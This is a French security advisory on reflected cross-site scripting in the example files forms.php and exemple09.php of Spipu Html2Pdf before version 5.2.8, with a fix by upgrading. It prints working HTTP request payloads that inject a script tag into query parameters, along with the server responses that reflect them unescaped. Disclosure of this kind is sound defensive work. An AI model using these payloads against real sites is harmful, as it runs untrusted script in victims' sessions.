
Spipu Html2Pdf < 5.2.8 - Vulnérabilités XSS dans les fichiers d'exemple
Spipu Html2Pdf < 5.2.8 - Vulnérabilités XSS dans les fichiers d'exemple.
Vulnérabilité de type Cross-Site-Scripting (XSS) dans les fichiers d'exemple de Spipu Html2Pdf. Cette vulnérabilité permet à un attaquant d'exécuter du code JavaScript non fiable dans le contexte de l'utilisateur actuellement connecté.
La vulnérabilité existe dans tout paramètre transmis aux fichiers d'exemple example9.php et forms.php.
Exemple de requête vers le script forms.php :
GET /html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script> HTTP/1.1
Host: example.afine.com
Cookie: PHPSESSID=oiqo2oopiqt88teqgfb0a23vk0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Réponse du serveur :
HTTP/1.1 200 OK
Server: Apache
Content-Length: 2215
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
<page footer="form">
<h1>Test de formulaire</h1><br>
<br>
<form action="http://example.afine.com:443/html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script>">
<input type="hidden" name="test" value="1">
[...]
Exemple de requête vers le script example9.php :
GET /html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/?nom=1 HTTP/1.1
Host: example.afine.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Réponse du serveur :
HTTP/1.1 200 OK
Date: Sat, 08 Jul 2023 18:32:51 GMT
Server: Apache
X-Powered-By: PHP/7.4.8
Content-Length: 795
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
<body>
<br>
Ceci est un exemple de génération de PDF via un bouton :)<br>
<br>
<img src="http://example.afine.com/html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/res/exemple09.png.php?px=5&py=20" alt="image_php" ><br>
<br>
<br>
<form method="get" action="">
[...]
Ce problème a été causé par un manque de neutralisation des paramètres de requête fournis. Ce problème a été corrigé dans la version 5.2.8 de Spipu Html2Pdf.
< 5.2.8
Mettez à jour Spipu Html2Pdf vers la version 5.2.8 ou une version plus récente.